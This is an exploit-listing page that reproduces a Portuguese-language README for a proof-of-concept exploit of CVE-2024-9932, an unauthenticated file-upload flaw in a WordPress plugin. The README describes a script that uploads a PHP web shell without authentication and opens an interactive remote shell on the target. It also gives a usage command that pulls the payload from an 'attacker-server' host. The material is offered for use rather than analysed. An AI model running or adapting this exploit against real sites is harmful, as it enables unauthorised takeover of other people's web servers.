Sploitus

0-click-RCE-Exploit-for

kitploit · 2026-08-28

Exploit Code

MARKDOWN29 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JOSHUAPROVOSTE-0-CLICK-RCE-EXPLOIT-FOR-CVE-2024-9932
# CVE-2024-9932 / Exploit de RCE sem clique (0-Click)

  * Autor: Joshua Provoste
  * https://x.com/JoshuaProvoste/status/1858329238153072668



![CVE-2024-9932](https://assets.kitploit.com/production/public/readmes/37100/39272ae9c9a95fa3efc72c94001f8ee1f7addebadd3668c8c6e6c3058afd3f28.png)

Este repositório contém um exploit de prova de conceito para o CVE-2024-9932, uma vulnerabilidade de upload arbitrário de arquivos sem autenticação no plugin Wux Blog Editor do WordPress, que leva à execução remota de comandos (RCE).

## O que o script faz

O script abusa de um endpoint REST vulnerável para fazer upload de um payload PHP remoto sem autenticação. Após o upload, ele reconstrói a localização final do arquivo, detecta o sistema operacional alvo e fornece um shell remoto interativo para execução de comandos.

## Uso

root@kitploit:~
    
    
    python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
    

Após a execução, o script faz o upload do payload, confirma sua acessibilidade, detecta o SO e oferece um shell interativo.

## Notas

  * Nenhuma autenticação necessária (pré-autenticação / 0-click).